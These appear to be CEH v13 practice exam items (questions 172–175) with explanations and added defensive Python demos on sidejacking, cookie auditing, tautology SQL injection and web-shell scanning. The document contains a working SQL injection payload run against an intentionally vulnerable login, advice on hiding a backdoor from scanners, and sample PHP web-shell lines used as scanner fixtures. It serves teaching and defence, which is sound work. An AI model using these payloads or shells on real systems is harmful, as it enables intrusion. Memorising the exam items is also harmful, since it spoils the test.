Which advanced mobile hacking technique is the hardest to detect and mitigate in a healthcare environment?
Correct Answer: A
Zero-day exploits are considered the most dangerous mobile attack vector in CEH v13 Mobile Platform Hacking. These exploits abuse previously unknown vulnerabilities, meaning no patches, signatures, or defenses exist at the time of attack. In healthcare environments, mobile devices access sensitive EHR systems and operate under strict compliance requirements. Zero-day exploits can bypass mobile OS security, sandboxing, and antivirus controls entirely. App spoofing and Bluejacking are easier to detect and mitigate through user awareness and Bluetooth controls. Side-channel attacks are highly specialized and rare in enterprise mobile environments. CEH v13 stresses that zero-day attacks pose the greatest risk due to lack of detection mechanisms, making Option A correct.
312-50v13 Exam Question 172
Working as an Information Security Analyst at a technology firm, you are designing training material for employees about the dangers of session hijacking. As part of the training, you want to explain how attackers could use sidejacking to compromise user accounts. Which of the following scenarios most accurately describes a sidejacking attack?
Correct Answer: B
According to the Certified Ethical Hacker (CEH) System Hacking and Session Hijacking module, sidejacking is a form of session hijacking where an attacker passively intercepts network traffic to capture unencrypted session cookies. These cookies are then reused to impersonate the authenticated user without needing credentials. CEH documentation explains that sidejacking commonly occurs on unencrypted HTTP connections, public Wi-Fi networks, or improperly secured internal networks. Once the session cookie is stolen, the attacker can replay it to gain access to the victim's active session. Option B correctly describes this mechanism and directly matches CEH's definition of sidejacking. Option A refers to perimeter exploitation, not session hijacking. Option C describes social engineering, which is unrelated to sidejacking. Option D is an example of cross-site scripting (XSS), not sidejacking. CEH emphasizes HTTPS enforcement and secure cookie attributes as key countermeasures.
312-50v13 Exam Question 173
In the crisp mountain air of Denver, Colorado, ethical hacker Lila Chen investigates the security framework of MediVault, a U.S.-based healthcare platform used by regional clinics to manage patient data. During her review, Lila discovers that sensitive records are weakly protected, allowing attackers to intercept and manipulate the information in transit. She warns that such weaknesses could be exploited to commit credit-card fraud, identity theft, or similar crimes. Further analysis reveals that MediVault is vulnerable to well-documented flaws such as cookie snooping and downgrade attacks. Which issue is MOST clearly indicated?
Correct Answer: B
The best answer is B, Cryptographic Failures, because the scenario centers on weak protection of sensitive data in transit, enabling an attacker to intercept and manipulate the information. In CEH-aligned web and application security concepts (and consistent with the OWASP Top 10 category of the same name), cryptographic failures occur when an application does not properly use cryptography or secure transport protections to ensure the confidentiality and integrity of sensitive data. If transport encryption is missing, weak, or incorrectly configured, attackers can perform man-in-the-middle interception, tamper with traffic, steal session material, and exfiltrate regulated data, leading to outcomes like identity theft and payment card fraud, exactly as described.

The references to cookie snooping and downgrade attacks reinforce this. Cookie snooping is the capture of session cookies exposed by insecure transport (for example, no HTTPS, mixed content, or cookies without the Secure attribute), which lets an attacker on the network path take over the victim's session. Downgrade attacks force a connection onto weaker security settings (older TLS versions or insecure cipher suites) or coerce a fallback from HTTPS to HTTP when HSTS is absent or misapplied. Both are tightly linked to improper cryptographic configuration and transport-layer security weaknesses.

Why the other options are not the best match: Broken Access Control concerns authorization (what users are allowed to access), not interception or manipulation of traffic. Identification and Authentication Failures cover login and session identity mechanisms (passwords, MFA, session handling), but the key failure here is weak cryptographic protection of data in transit. Security Misconfiguration can be a contributing cause (e.g., a misconfigured TLS stack), but the question asks for the resulting weakness category, insufficient cryptographic/transport protection, which makes Cryptographic Failures the most precise answer. Therefore, MediVault's exposure to interception, manipulation, cookie snooping, and downgrade attacks most clearly indicates Cryptographic Failures.
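The countermeasures named in the sidejacking answer (Question 172: HTTPS enforcement and secure cookie attributes) and the cookie snooping and downgrade weaknesses in this answer both come down to a handful of response headers. The following Python script is an added example, not CEH material, that audits one HTTP response for exactly those weaknesses. The header sets, the one-year HSTS max-age threshold and the session-cookie name heuristic are constructed assumptions for the demo.

```python
"""Added example, not part of the CEH material: audit one HTTP response for the
transport and cookie weaknesses behind sidejacking, cookie snooping and HTTPS
downgrade. Headers below are constructed for the demo, not captured traffic."""

# Hardening threshold for HSTS max-age (one year); an assumption, not a CEH value.
MIN_HSTS_MAX_AGE = 31536000
# Name fragments used to guess which cookies carry a session (assumed heuristic).
SESSION_COOKIE_HINTS = ("sess", "sid", "auth", "token")


def parse_set_cookie(value):
    """Split a Set-Cookie value into (cookie name, {attribute: value}).

    Attribute names are lower-cased; valueless flags (Secure, HttpOnly) map to True.
    """
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for part in parts[1:]:
        if "=" in part:
            key, val = part.split("=", 1)
            attrs[key.strip().lower()] = val.strip()
        elif part:
            attrs[part.lower()] = True
    return name, attrs


def hsts_max_age(value):
    """Return the integer max-age from an HSTS header, or None if absent/invalid."""
    for directive in value.split(";"):
        key, _, val = directive.strip().partition("=")
        if key.strip().lower() == "max-age":
            try:
                return int(val.strip().strip('"'))
            except ValueError:
                return None
    return None


def audit_response(scheme, headers):
    """Return a list of findings for a response served over `scheme` (http/https).

    `headers` is a list of (name, value) pairs as seen on the wire, because
    Set-Cookie may legitimately appear more than once.
    """
    findings = []
    hsts = None
    for hname, hvalue in headers:
        lname = hname.lower()
        if lname == "strict-transport-security":
            hsts = hvalue
        elif lname == "set-cookie":
            name, attrs = parse_set_cookie(hvalue)
            is_session = any(hint in name.lower() for hint in SESSION_COOKIE_HINTS)
            if "secure" not in attrs:
                findings.append(f"cookie {name}: no Secure flag, browser will send it over "
                                "plain HTTP (cookie snooping / sidejacking)")
            if is_session and "httponly" not in attrs:
                findings.append(f"cookie {name}: no HttpOnly flag, readable by injected script")
            if is_session and "samesite" not in attrs:
                findings.append(f"cookie {name}: no SameSite attribute")
    if scheme.lower() != "https":
        findings.append("served over plain HTTP: content and cookies are sniffable in transit")
    elif hsts is None:
        findings.append("no Strict-Transport-Security: HTTPS can be stripped to HTTP (downgrade)")
    else:
        age = hsts_max_age(hsts)
        if age is None or age < MIN_HSTS_MAX_AGE:
            findings.append(f"HSTS max-age {age} below {MIN_HSTS_MAX_AGE}: downgrade window reopens early")
    return findings


# Constructed responses: a weak deployment and its hardened counterpart.
WEAK_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "SESSIONID=abc123; Path=/"),
]
HARDENED_HEADERS = [
    ("Content-Type", "text/html"),
    ("Strict-Transport-Security", "max-age=63072000; includeSubDomains"),
    ("Set-Cookie", "SESSIONID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"),
]

if __name__ == "__main__":
    for finding in audit_response("http", WEAK_HEADERS):
        print("WEAK:", finding)
    print("HARDENED:", audit_response("https", HARDENED_HEADERS) or "no findings")
```

The weak response yields four findings (no Secure, no HttpOnly, no SameSite, plain HTTP) and the hardened one none. The same weak cookie served over HTTPS still produces four findings, because without HSTS an attacker on the path can strip the first request to HTTP and the browser will attach the non-Secure cookie.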
312-50v13 Exam Question 174
A tester evaluates a login form that constructs SQL queries using unsanitized user input. By submitting 1 OR 'T'='T'; --, the tester gains unauthorized access to the application. What type of SQL injection has occurred?
Correct Answer: A
This scenario represents a Tautology-Based SQL Injection, a fundamental technique covered under the Web Application Hacking module in the CEH v13 curriculum. Its defining characteristic is the injection of a condition that always evaluates to TRUE, bypassing authentication or authorization logic. A typical vulnerable login query might be built from the submitted fields as: SELECT * FROM users WHERE user_id = <input> AND password = '<input>'; With the payload 1 OR 'T'='T'; -- supplied as the user ID, the statement becomes: SELECT * FROM users WHERE user_id = 1 OR 'T'='T'; -- AND password = '...'; The expression 'T'='T' is a tautology, so the WHERE clause matches every row, and the -- comment discards the password check that followed it. The database returns records without validating the credentials, granting unauthorized access. According to EC-Council CEH v13, tautology-based SQL injection is a boolean-logic technique in which attackers exploit missing input validation to alter the logical flow of a query. It does not depend on database error messages (Error-Based SQL Injection), does not extract data with UNION statements (Union-Based SQL Injection), and does not rely on response delays (Time-Based Blind SQL Injection). CEH v13 emphasizes that such attacks are especially effective against login forms when developers fail to use input validation and parameterized queries or prepared statements. It is one of the most common and exam-tested SQL injection types because it shows how flawed query logic compromises an application without any advanced technique, and it is the foundation for recognizing and mitigating more complex variants.
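To see the tautology do its work and the parameterized query defeat it, here is an added Python example (not from the CEH material) that runs the question's payload against an in-memory SQLite database. The users table, its rows and the plaintext password column are constructed to mirror the question's query; a real application stores password hashes.

```python
"""Added example, not CEH material: the tautology payload from the question run
against an in-memory SQLite table, beside the parameterized query that defeats it.
The table, rows and plaintext passwords are constructed to mirror the question."""
import sqlite3

PAYLOAD = "1 OR 'T'='T'; --"   # the exact string the tester submits as the user ID


def make_db():
    """Constructed users table; plaintext passwords only to match the question's query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "alice", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, user_id, password):
    """Builds the query by string formatting, the flaw described in the question.

    Returns the usernames the query matched; a non-empty list means 'logged in'.
    With PAYLOAD the SQL becomes:
      SELECT username FROM users WHERE user_id = 1 OR 'T'='T'; -- AND password = '...'
    so the tautology matches every row and the comment drops the password check.
    """
    query = (f"SELECT username FROM users WHERE user_id = {user_id} "
             f"AND password = '{password}'")
    return [row[0] for row in conn.execute(query)]


def login_safe(conn, user_id, password):
    """Parameterized form: the driver binds the payload as a value, never as SQL.

    The bound text "1 OR 'T'='T'; --" is compared to the INTEGER column as a
    literal string, matches nothing, and the password check is still applied.
    """
    query = "SELECT username FROM users WHERE user_id = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (user_id, password))]


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, wrong password:", login_vulnerable(conn, PAYLOAD, "wrong"))
    print("parameterized, same payload:", login_safe(conn, PAYLOAD, "wrong"))
    print("parameterized, real creds:  ", login_safe(conn, 1, "s3cret"))
```

The vulnerable function returns both accounts for a wrong password (the first row returned is typically the one an application treats as the logged-in user), while the parameterized version returns nothing for the payload and exactly one row for valid credentials.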
312-50v13 Exam Question 175
After installing a backdoor on a web server, what action best ensures it remains undetected?
Correct Answer: D
In CEH v13 Maintaining Access, stealth and persistence are the key goals after compromise. Placing a backdoor in a file type excluded from resource maps (such as image metadata, configuration files, or uncommon extensions) reduces the likelihood of discovery by automated scanners and integrity checks. Option D is correct because many security tools focus on executable or commonly accessed web files; files excluded from resource maps are less likely to be scanned or monitored. Option A increases detection risk because frequent changes stand out in file-integrity monitoring. Option B increases signature visibility. Option C still exposes the file to access logs and monitoring. CEH v13 highlights that attackers often hide backdoors in non-obvious locations to avoid detection. For defenders, the lesson is the converse: integrity monitoring and web-shell scanning should cover the whole web root by file content, not only the extensions a scanner maps to executable code. Therefore, Option D is correct.
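As an added defender-side example (not from the CEH material), the following Python script walks a web root and flags PHP code in files that an extension-keyed scanner would skip, which is precisely the hiding place the answer describes. The sample tree, the script-extension list and the web-shell keyword heuristic are constructed assumptions; tune them to the stack you actually run.

```python
"""Added example, not CEH material: sweep a web root for backdoors hidden in
files a resource-map or extension-based scanner ignores. The sample tree is
constructed in a temporary directory; the heuristics are assumptions to tune."""
import os
import re
import tempfile

# Extensions the server normally treats as PHP (assumed; match your server config).
SCRIPT_EXTENSIONS = {".php", ".phtml", ".php5", ".phar"}
# A PHP open tag in a non-script file is the primary signal.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
# Execution primitives fed from request data are the typical web-shell shape.
SHELL_HINTS = re.compile(rb"\b(eval|assert|system|passthru|shell_exec)\s*\(", re.IGNORECASE)


def scan_webroot(root):
    """Return sorted (relative path, reason) pairs for files worth a closer look.

    Every file is read by content regardless of extension, so an image, a backup
    config or an odd extension cannot opt out of the check.
    """
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            ext = os.path.splitext(fn)[1].lower()
            with open(path, "rb") as fh:
                data = fh.read()
            if ext not in SCRIPT_EXTENSIONS and PHP_TAG.search(data):
                hits.append((rel, "php code in non-script file"))
            elif ext in SCRIPT_EXTENSIONS and SHELL_HINTS.search(data) and b"$_" in data:
                hits.append((rel, "script executes request-controlled input"))
    return sorted(hits)


def build_sample_tree():
    """Constructed web root: clean files plus three backdoor patterns to detect."""
    root = tempfile.mkdtemp(prefix="webroot_")
    files = {
        "index.php": b"<?php echo 'hello'; ?>",
        "css/site.css": b"body { color: #333; }",
        # PHP appended after a JPEG header: invisible to a scanner that skips images.
        "images/logo.jpg": b"\xff\xd8\xff\xe0JFIF fake image\n<?php eval(base64_decode($_POST['c'])); ?>",
        # A 'backup' config file with an uncommon extension.
        "config/.env.bak": b"DB_HOST=localhost\n<?php system($_GET['cmd']); ?>",
        # A script with a legitimate extension that still behaves like a shell.
        "admin/tool.php": b"<?php passthru($_REQUEST['x']); ?>",
    }
    for rel, data in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for rel, reason in scan_webroot(root):
        print(f"{rel}: {reason}")
```

Run against the sample tree it reports the image, the backup config and the admin script, and leaves index.php and the stylesheet alone. In production, pair this with a baseline of known-good hashes so a legitimate .php file that already contains eval is not re-reported on every sweep.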